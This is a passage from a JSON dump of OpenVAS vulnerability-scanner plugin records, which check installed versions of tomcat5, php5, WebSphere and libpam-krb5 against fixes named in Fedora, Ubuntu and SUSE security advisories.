\"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_name( \"Fedora Update for tomcat5 FEDORA-2008-8130\");\n\n script_summary(\"Check for the Version of tomcat5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat5\", rpm:\"tomcat5~5.5.27~0jpp.2.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-04T11:29:19", "description": "The remote host is missing an update to php5\nannounced via advisory USN-720-1.\n\nFor details, please visit the referenced security advisories.", "cvss3": {}, "published": "2009-06-05T00:00:00", "type": "openvas", "title": "Ubuntu USN-720-1 (php5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-3659", "CVE-2008-2939", "CVE-2008-5625", "CVE-2008-2364", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-1947", "CVE-2008-5658", "CVE-2007-5900", "CVE-2008-2938", "CVE-2008-5624", "CVE-2008-2370", "CVE-2007-3996", "CVE-2007-5625", "CVE-2008-5557", "CVE-2008-1232", "CVE-2007-6420"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64167", "href": "http://plugins.openvas.org/nasl.php?oid=64167", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_720_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_720_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-720-1 (php5)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libapache2-mod-php5 5.1.2-1ubuntu3.13\n php5-cgi 5.1.2-1ubuntu3.13\n php5-cli 5.1.2-1ubuntu3.13\n php5-gd 5.1.2-1ubuntu3.13\n\nUbuntu 7.10:\n libapache2-mod-php5 5.2.3-1ubuntu6.5\n php5-cgi 5.2.3-1ubuntu6.5\n php5-cli 5.2.3-1ubuntu6.5\n php5-gd 5.2.3-1ubuntu6.5\n\nUbuntu 8.04 LTS:\n libapache2-mod-php5 5.2.4-2ubuntu5.5\n php5-cgi 5.2.4-2ubuntu5.5\n php5-cli 5.2.4-2ubuntu5.5\n php5-gd 5.2.4-2ubuntu5.5\n\nUbuntu 8.10:\n libapache2-mod-php5 5.2.6-2ubuntu4.1\n libapache2-mod-php5filter 5.2.6-2ubuntu4.1\n php5-cgi 5.2.6-2ubuntu4.1\n php5-cli 5.2.6-2ubuntu4.1\n php5-gd 5.2.6-2ubuntu4.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-720-1\";\n\ntag_summary = \"The remote host is missing an update to php5\nannounced via advisory USN-720-1.\n\nFor details, please visit the referenced security advisories.\";\n\n \n\n\nif(description)\n{\n script_id(64167);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2007-3996\", \"CVE-2007-5900\", \"CVE-2008-3658\", \"CVE-2008-3659\", \"CVE-2008-3660\", \"CVE-2008-5557\", \"CVE-2008-5624\", \"CVE-2008-5625\", \"CVE-2008-5658\", \"CVE-2007-5625\", \"CVE-2007-6420\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2364\", \"CVE-2008-2370\", \"CVE-2008-2938\", \"CVE-2008-2939\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-720-1 (php5)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-720-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.2-1ubuntu3.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.3-1ubuntu6.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.4-2ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6-2ubuntu4.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:38", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n websphere-as_ce\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for Websphere Community Edition", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-5342", "CVE-2007-5333", "CVE-2007-3382", "CVE-2007-0184", "CVE-2007-0185", "CVE-2008-1947", "CVE-2007-2450", "CVE-2007-2449", "CVE-2007-5613", "CVE-2007-3386", "CVE-2008-2938", "CVE-2007-5461", "CVE-2007-6286", "CVE-2008-2370", "CVE-2007-2377", "CVE-2007-3385", "CVE-2008-1232", "CVE-2007-5615", "CVE-2008-0002"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065836", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065836", "sourceData": "#\n#VID slesp2-websphere-as_ce-5850\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Websphere Community Edition\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n websphere-as_ce\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65836\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2007-0184\", \"CVE-2007-0185\", \"CVE-2007-2377\", \"CVE-2007-2449\", \"CVE-2007-2450\", \"CVE-2007-3382\", \"CVE-2007-3385\", \"CVE-2007-3386\", \"CVE-2007-5333\", \"CVE-2007-5342\", \"CVE-2007-5461\", \"CVE-2007-5613\", \"CVE-2007-5615\", \"CVE-2007-6286\", \"CVE-2008-0002\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2008-2938\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES10: Security update for Websphere Community Edition\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"websphere-as_ce\", rpm:\"websphere-as_ce~2.1.0.1~3.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:28:39", "description": "The remote host is missing an update to libpam-krb5\nannounced via advisory USN-719-1.", "cvss3": {}, "published": "2009-06-05T00:00:00", "type": "openvas", "title": "Ubuntu USN-719-1 (libpam-krb5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-3659", "CVE-2009-0361", "CVE-2008-2939", "CVE-2008-5625", "CVE-2008-2364", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-1947", "CVE-2008-5658", "CVE-2007-5900", "CVE-2008-2938", "CVE-2008-5624", "CVE-2009-0360", "CVE-2008-2370", "CVE-2007-3996", "CVE-2007-5625", "CVE-2008-5557", "CVE-2008-1232", "CVE-2007-6420"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64166", "href": "http://plugins.openvas.org/nasl.php?oid=64166", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_719_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_719_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-719-1 (libpam-krb5)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n libpam-krb5 3.10-1ubuntu0.8.04.1\n\nUbuntu 8.10:\n libpam-krb5 3.10-1ubuntu0.8.10.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-719-1\";\n\ntag_insight = \"It was discovered that pam_krb5 parsed environment variables when run with\nsetuid applications. A local attacker could exploit this flaw to bypass\nauthentication checks and gain root privileges. (CVE-2009-0360)\n\nDerek Chan discovered that pam_krb5 incorrectly handled refreshing existing\ncredentials when used with setuid applications. A local attacker could exploit\nthis to create or overwrite arbitrary files, and possibly gain root privileges.\n(CVE-2009-0361)\";\ntag_summary = \"The remote host is missing an update to libpam-krb5\nannounced via advisory USN-719-1.\";\n\n \n\n\nif(description)\n{\n script_id(64166);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-0360\", \"CVE-2009-0361\", \"CVE-2007-3996\", \"CVE-2007-5900\", \"CVE-2008-3658\", \"CVE-2008-3659\", \"CVE-2008-3660\", \"CVE-2008-5557\", \"CVE-2008-5624\", 